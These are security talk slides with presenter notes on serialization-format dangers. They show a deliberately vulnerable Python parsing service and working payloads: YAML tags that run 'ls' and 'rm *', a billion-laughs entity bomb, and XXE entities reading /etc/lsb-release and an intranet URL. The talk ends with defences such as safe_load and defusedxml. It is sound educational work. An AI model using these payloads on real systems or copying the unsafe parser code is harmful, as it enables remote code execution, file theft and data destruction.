Serialization formats aren't toys

Tom Eastman tom@catalyst.net.nz @tveastman

Presenter Notes

Who am I?

Presenter Notes

I'm a python developer. I'm not a security expert or a penetration tester.

But my drinking buddies all are, and so I have developed a healthily paranoid worldview, because I don't like it when they break my toys.

Who are you?

Presenter Notes

If you are an IT security professional, you already know all this stuff.

If you're a developer, it's about being aware that this is even a thing.

I'm nervous about talking in front of a crowd about things that some might think are 'remedial'.

But the problem is, the same mistakes keep getting made, and so clearly some people still need to be told. Spread the word!

Why am I talking about this?

Presenter Notes

I was working on a project where I ever-so-consciencously mitigated all of the OWASP Top 10. I did a decent enough job of it but I was unable to protect myself from what I didn't know about.

And then after a talk from Mike Haworth of Aura. I realized I had more than those 10 to worry about. I went back to work and DOS'd my app in 2 minutes.

As do we all, because an attacker only has to know one thing you don't to screw you over.

90% of magic merely consists of knowing one extra fact.

Presenter Notes

It's a terry pratchett quote, but it's pretty appropriate when it comes to breaking apps.

The smart hackers know about all the bugs in all the software.

The REALLY smark hackers know about all the features in all the software.

It's not a bug, it's a feature.

Presenter Notes

Everything I'm talking about today is a feature, not a bug.

These are all things that someone thought was a great idea.

Serialization Formats

Presenter Notes

Or markup languages or whatever you want to call them.

I just mean formats that structure data we take in so it doesn't suck to get information out of them.

XML, YaML, JSON in this talk, but there are a billion of them, in all kinds of languages and uses.

All of them have little surprises tucked away. ALL of them are too smart for their own good sometimes.

PaaS (Parsing as a Service)

 1 import bottle
 2 import StringIO
 3 
 4 @bottle.post('/yaml')
 5 def yaml():
 6     ## PyYAML -- the de facto standard parser.
 7     import yaml
 8     return str(yaml.load(bottle.request.body)) + '\n'
 9 
10 @bottle.post('/lxml')
11 def lxml():
12     ## The most popular Python XML library (libxml2 based)
13     from lxml import etree
14     tree = etree.parse(bottle.request.body)
15     return tree.getroot().text
16 
17 @bottle.post('/xml')
18 def xml():
19     ## Python's standard library XML parser
20     from xml.etree import ElementTree
21     tree = ElementTree.parse(bottle.request.body)
22     return tree.getroot().text
23 
24 if __name__ == '__main__':
25     bottle.run(host='localhost', port=8080, debug=True)

Presenter Notes

This is my little example I used for preparing this talk.

A tiny web service that is simply parsing the markup and then returning what was parsed. Just for my examples in this talk.

Each endpoint is the bare minimum code to get from zero-to-parsing. No option setting. Import library; use library.

This is what someone who needs a parser in a hurry WILL do.

YAML

Presenter Notes

Let's start with YAML because it's been in the news lately.

YAML's been around since 2001ish and is very popular in languages like Ruby and Python.

It pretends to be a human readable serialization format.

Parsing YAML

POST /yaml

1 first_name: Tom
2 last_name: Eastman
3 email_address: tom@catalyst.net.nz

RESPONSE

1 {'email_address': 'tom@catalyst.net.nz',
2 'first_name': 'Tom',
3 'last_name': 'Eastman'}

Presenter Notes

I've got a bunch of slides like this. At the top is the raw input to my little web service, in this case a simple snippet of YAML.

Below that I have the parsed output, which is a Python dictionary object.

Parsing YAML

POST /yaml

1 'first_name': Tom
2 'last_name': Eastman
3 'email_address': tom@catalyst.net.nz
4 'birthday': !!python/object/apply:datetime.date [1980, 1, 1]

RESPONSE

1 {'email_address': 'tom@catalyst.net.nz',
2  'first_name': 'Tom',
3  'last_name': 'Eastman',
4  'birthday': datetime.date(1980, 1, 1)}

Presenter Notes

Here's we're doing something much more clever -- we're instantiating an instance of a Python date class.

The YAML Parser finds the datetime module and instances a 'date' using the arguments provided.

Did a shiver go down anyone's spine?

... hmm, what else can we do ...

Presenter Notes

Parsing YAML

POST /yaml

1 'first_name': Tom
2 'last_name': Eastman
3 'email_address': tom@catalyst.net.nz
4 'contents_of_cwd': !!python/object/apply:subprocess.check_output ['ls']

RESPONSE

1 {'email_address': 'tom@catalyst.net.nz',
2  'first_name': 'Tom',
3  'last_name': 'Eastman',
4  'contents_of_cwd': 'badservice.py\nbadservice.py~\nbob.yaml\nbob.yaml~\nthousandlaughs.xml\nxxe_1.xml\n'}

Presenter Notes

Well, this can't be good.

I can use the exact same mechanism to 'instantiate' the python standard library function for shelling out to the system.

hey... I wonder if...

Presenter Notes

Famous last words?

Parsing YAML

POST /yaml

1 'first_name': Tom
2 'last_name': Eastman
3 'email_address': tom@catalyst.net.nz
4 'goodbye': !!python/object/apply:os.system ['rm *']
5 'contents_of_cwd': !!python/object/apply:subprocess.check_output ['ls']

RESPONSE

1 {'first_name': 'Tom',
2 'email_address': 'tom@catalyst.net.nz',
3 'last_name': 'Eastman',
4 'goodbye': 0,
5 'contents_of_cwd': '\n'}

Presenter Notes

C'mon, I had to try it, right?

And so yeah, I ended up re-writing my little web server after that call cleaned out the directory it was in.

Surely this doesn't happen in real life?

Presenter Notes

That's so blatantly bad that surely this wouldn't actually happen in real life, right?

November 2011

TastyPIE Bug Report

Presenter Notes

Two of the most popular REST framework libraries used with Django

January 2013

Rails bug report

Presenter Notes

Ruby on Rails, which you've probably heard of.

February 2013

Rails bug report again

Presenter Notes

June 2013

Puppet bug report

Presenter Notes

This is the one that made me want to write this talk.

Also in June 2013

Node.js bug report

Presenter Notes

How do I protect myself?

Presenter Notes

Make the parser stupider

Presenter Notes

Disable YAML tag parsing

Python

1 ## ...instead of...
2 result = yaml.load(something)
3 ## ..just use..
4 result = yaml.safe_load(something)
5 ## easy-peasy!

Ruby

1 ## https://github.com/dtao/safe_yaml
2 YAML.load(something, :safe => true)
3 ## (blows my mind that you need an external gem...)
4 ## (but I could be missing something)

Presenter Notes

By the way, I think you're actually a little bit SAFER in one way with ruby.

Based on what I've read, the ruby parser requires the class you're deserializing to be already loaded.

The python one, on the other hand, will happily import the module for you.

XML

Presenter Notes

I was trying to think of something scary like "Fun with XML" or "Dangerous XML", but it speaks for itself.

Entities

POST /lxml

1 <?xml version="1.0" encoding="ISO-8859-1"?>
2 <foo>
3   Yay! Smile!  &#9786;
4 </foo>

RESPONSE

1 Yay! Smile!  ☺

Presenter Notes

Defining entities

POST /lxml

1 <?xml version="1.0" encoding="ISO-8859-1"?>
2 <!DOCTYPE foo [
3   <!ELEMENT foo ANY >
4   <!ENTITY smiley "&#9786;"  >]>
5 <foo>
6    Yay! Smile!  &smiley;
7 </foo>

RESPONSE

1 Yay! Smile!  ☺

Presenter Notes

Recursive entity expansion

POST /xml

 1 <?xml version="1.0" encoding="ISO-8859-1"?>
 2 <!DOCTYPE foo [
 3   <!ELEMENT foo ANY >
 4   <!ENTITY smiley "&#9786;"  >
 5   <!ENTITY s2 "&smiley;&smiley;&smiley;&smiley;&smiley;">
 6   <!ENTITY s3 "&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&s2;&#x000A;">
 7   <!ENTITY s4 "&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;&s3;">]>
 8 <foo>
 9    Yay! Smile! &s4;
10 </foo>

RESPONSE

 1 Yay! Smile! 
 2 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 3 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 4 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 5 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 6 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 7 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 8 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
 9 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
10 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺
11 ☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺☺

Presenter Notes

The Billion Laughs Attack

POST /xml

 1 <?xml version="1.0"?>
 2 <!DOCTYPE lolz [
 3  <!ENTITY lol "lol">
 4  <!ELEMENT lolz (#PCDATA)>
 5  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 6  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 7  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 8  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 9  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
10  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
11  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
12  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
13  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
14 ]>
15 <lolz>&lol9;</lolz>

RESPONSE

<smoking ruin>

Presenter Notes

Actually, this is only the 168 million laughs attack

Funny story, my laptop exploded before I could even post this to my test server, because the text editor I was using tried to parse it.

... what else can we do ...

Presenter Notes

External entities

POST /lxml

 1 <?xml version="1.0" encoding="ISO-8859-1"?>
 2 <!DOCTYPE foo [
 3    <!ELEMENT foo ANY >
 4    <!ENTITY smiley "&#9786;">
 5    <!ENTITY lsb_release SYSTEM "file:///etc/lsb-release">]>
 6 <foo>
 7   Tell me more about yourself...
 8 
 9   &lsb_release;
10 </foo>

RESPONSE

1 Tell me more about yourself...
2 
3 DISTRIB_ID=Ubuntu
4 DISTRIB_RELEASE=12.04
5 DISTRIB_CODENAME=precise
6 DISTRIB_DESCRIPTION="Ubuntu 12.04.3 LTS"

Presenter Notes

ANY file the parser can read is fair game.

I'll bet the parser can read the apps configuration files.

Of course it can read its own source code.

External entities

POST /lxmlnet

1 <?xml version="1.0" encoding="ISO-8859-1"?>
2 <!DOCTYPE foo [
3    <!ELEMENT foo ANY >
4    <!ENTITY a_file_on_the_local_intranet 
5      SYSTEM "http://192.168.76.82/hello">]>
6 <foo>
7 &a_file_on_the_local_intranet;
8 </foo>

RESPONSE

1 Hi!
2 
3 I'm a file on Tom's laptop's webserver.
4 
5 Isn't that nice?

Presenter Notes

Good news: The Python LXML library actually tried to stop this. It defaulted to not allowing me to expand network entities.

Hey look! An attacker can use the XML parser to port-scan the internal network. You could even connect to port 25/110/etc

Surely this doesn't happen in real life?

Presenter Notes

all. the. time.

Presenter Notes

Yeah sorry, I'm not going to do a slideshow for you.

I'm too scared I'll find out that this happens more often than it NOT happens.

It's an education problem: sometimes the same people who do this are leaving their parsers running as root.

How do I protect myself?

Presenter Notes

How do I protect myself?

  • Don't allow DTDs
  • Don't expand entities
  • Don't resolve externals
  • Limit parse depth
  • Limit total input size
  • Limit parse time
  • Favor a SAX or iterparse-like parser for potential large data
  • Validate and properly quote arguments to XSL transformations and XPath queries
  • Don't use XPath expression from untrusted sources
  • Don't apply XSL transformations that come untrusted sources

https://www.isecpartners.com/media/12976/iSEC-HILL-Attacking-XML-Security-bh07.pdf

Presenter Notes

Oh, is that all? that's easy!

That's a lot of work. But it boils down to the same thing as before...

Make the parser stupider

Presenter Notes

Make the parser stupider

Python

  • defusedxml https://pypi.python.org/pypi/defusedxml

Other languages

  • Work out how to turn off the features you don't absolutely need.
  • If you need some of these features, maybe re-think your needs?

Presenter Notes

JSON: Finally stupid enough?

Presenter Notes

...only if you use a stupid enough parser!

Presenter Notes

eval() is not a stupid enough parser.

Presenter Notes

eval() is not a stupid enough parser.

W3Schools

Presenter Notes

eval() is not a stupid enough parser.

JSON.org

Presenter Notes

In fairness, both of these pages, further down, say that using eval 'might cause security concerns'.

Why don't they SAY THAT FIRST?!

The lesson

Presenter Notes

Beware of flexibility

Presenter Notes

If a tool sells itself as "Look what I can do!", lookout!

Disable EVERYTHING

Presenter Notes

Features that surprise are worse than bugs that surprise you.

No-one's really suprised by bugs, after all.

K.I.S.S.

Presenter Notes

Thanks for your time!

Tom Eastman tom@catalyst.net.nz @tveastman

Presenter Notes